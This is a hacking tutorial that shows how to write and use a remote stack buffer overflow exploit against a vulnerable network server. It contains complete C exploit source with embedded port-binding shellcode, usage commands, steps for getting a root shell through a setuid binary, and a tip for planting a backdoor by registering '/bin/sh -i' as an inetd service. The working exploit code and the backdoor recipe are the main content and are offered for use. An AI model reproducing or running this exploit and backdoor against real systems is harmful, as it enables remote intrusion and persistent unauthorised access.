1. First let's find out the ESP. OK, we've got it (we've got an address near the ESP, which isn't any problem, because we'll fill the buffer with NOPs). Then you should find a good shellcode which binds a shell on a port. Don't forget: in remote exploits we can't use local exploit shellcodes (OK, we could, but it isn't very clever), so we have to find another way to get a shell. What about a portbinder shellcode, which binds a shell on a port?

OK, on the net there are many of these portbinder shellcodes, e.g. www.hack.co.za or my page *g*.

2. Declare a buffer which is bigger than 1024 bytes; let's make it 1064 bytes, so there is no problem overwriting EIP. Don't forget: you only have to declare a buffer which is greater than 1024 bytes.

3. Let's prepare the buffer. Now let's first fill the whole buffer with NOP's:

memset(buffer, 0x90, 1064);



4. Let's copy the shellcode into the buffer:

memcpy(buffer+1001-sizeof(shellcode), shellcode, sizeof(shellcode));

Here we put the shellcode in the middle of the buffer.

Why? If we have enough NOPs at the beginning, our chance of executing the shellcode gets better.

5. Let's remove the null byte that memcpy() left in the buffer (sizeof(shellcode) includes the terminating NUL of the string):

buffer[1000] = 0x90; // 0x90 is the NOP in hexadecimal

6. Let's copy the return address to the end of the buffer:

for(i = 1022; i < 1059; i+=4)
{
    *((int *) &buffer[i]) = RET;
    // RET is the return address we want to use... #define'd in the header
}

We know that the buffer ends at 1024 bytes, but to be sure we begin at 1022, then copy the return address until we've got 1059 bytes; that is enough because we've already overwritten EIP (we hope so *g*).

7. Let's add a \0 null byte at the end of our prepared buffer:

buffer[1063] = 0x0;

Now we've prepared our buffer, and only need to send it to the vulnerable host, by port and host or IP.

-------------------------------------------- exploit.c --------------------------------------------------

/* Simple remote exploit, which binds a shell on port 3789
 * by triton
 *
 * After the return address was overwritten, you can connect
 * with telnet or netcat to the victim host on port 3789.
 * After you logged in... there's nothing, but try to enter "id;" (don't forget the semicolon).
 * So you should get an output; ok, you've got a shell *g*. Always use:
 *
 * <command>;
 *
 * to execute.
 */

#include <stdio.h>
#include <stdlib.h>       /* atoi */
#include <string.h>       /* memset, memcpy */
#include <unistd.h>       /* close */
#include <netdb.h>
#include <sys/socket.h>
#include <netinet/in.h>

//Portbinding Shellcode
char shellcode[] =
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

//standard offset (probably must be modified)
#define RET 0xbffff5ec

int main(int argc, char *argv[]) {
    char buffer[1064];
    int s, i, size;
    struct sockaddr_in remote;
    struct hostent *host;

    if(argc != 3) {
        printf("Usage: %s target-ip port\n", argv[0]);
        return -1;
    }
    // filling buffer with NOPs
    memset(buffer, 0x90, 1064);
    //copying shellcode into buffer
    memcpy(buffer+1001-sizeof(shellcode), shellcode, sizeof(shellcode));
    // the previous statement causes an unintentional Nullbyte at buffer[1000]
    buffer[1000] = 0x90;
    // Copying the return address multiple times at the end of the buffer...
    for(i=1022; i < 1059; i+=4) {
        *((int *) &buffer[i]) = RET;
    }
    buffer[1063] = 0x0;
    //getting hostname
    host=gethostbyname(argv[1]);
    if (host==NULL)
    {
        fprintf(stderr, "Unknown Host %s\n",argv[1]);
        return -1;
    }
    // creating socket...
    s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
    {
        fprintf(stderr, "Error: Socket\n");
        return -1;
    }
    //state protocol family, then converting the hostname or IP address, and getting port number
    remote.sin_family = AF_INET;
    remote.sin_addr = *((struct in_addr *)host->h_addr);
    remote.sin_port = htons(atoi(argv[2]));
    // connecting with destination host
    if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
    {
        close(s);
        fprintf(stderr, "Error: connect\n");
        return -1;
    }
    //sending exploit string
    size = send(s, buffer, sizeof(buffer), 0);
    if (size==-1)
    {
        close(s);
        fprintf(stderr, "sending data failed\n");
        return -1;
    }
    // closing socket
    close(s);
    return 0;
}

--------------------------------------------- EOF-------------------------------------------------------

7. Using the exploit

user@linux~/ > gcc exploit.c -o exploit

user@linux~/ > ./exploit <host> <port>

Now it should work, if you got the right return address, or one of the right return addresses.

user@linux~/ > telnet <host> 3879

If you're connected, then try this:

id;

uid=500(user) gid=500(user) groups=500(user)

As you can see, it works very well.





8. Getting root privileges

Do the following:

user@linux~/ > su

password: ******

root@linux~/ > ls -ln vulnerable

-rwxrwxr-x 1 500 500 14106 Jun 18 14:12 vulnerable

root@linux~/ > chown root vulnerable

root@linux~/ > chmod 6755 vulnerable

root@linux~/ > ./vulnerable <port>

Now you can exploit the server program, and you should get a root shell *g*

9. Enter the service in inetd.conf

OK, we're interested in how the program would work if it were a daemon. Now do the following:

First copy the vulnerable program to /usr/bin/

root@linux~/ > cp vulnerable /usr/bin/vulnerable

Now let's modify some files...

root@linux~/ > vi /etc/services

(Feel free to use your favourite editor instead of vi)

Define a port which you want to take. I'll take port 1526; now let's enter this information into /etc/services:

vulnerable 1526/tcp # defining port for our server program, save and quit

Now edit the inetd.conf file:

root@linux~/ > vi /etc/inetd.conf

put in:

vulnerable stream tcp nowait root /usr/bin/vulnerable vulnerable 1526

Now save the inetd.conf file and quit.

root@linux~/ > killall -HUP inetd

Now restart inetd and everything should work..

Note: This is also a good way to make a backdoor: add a service in /etc/services, then add the entry in inetd.conf and write /bin/sh sh -i or sh -h *g*....

9. Problem solutions

If the exploit doesn't work, think about the return address; it could be wrong. Test it with gdb....

user@linux~/ > gdb vulnerable

.....

(gdb) run <port>

Now you can exploit the program; if it doesn't work, look at the output of gdb and try to find out the address.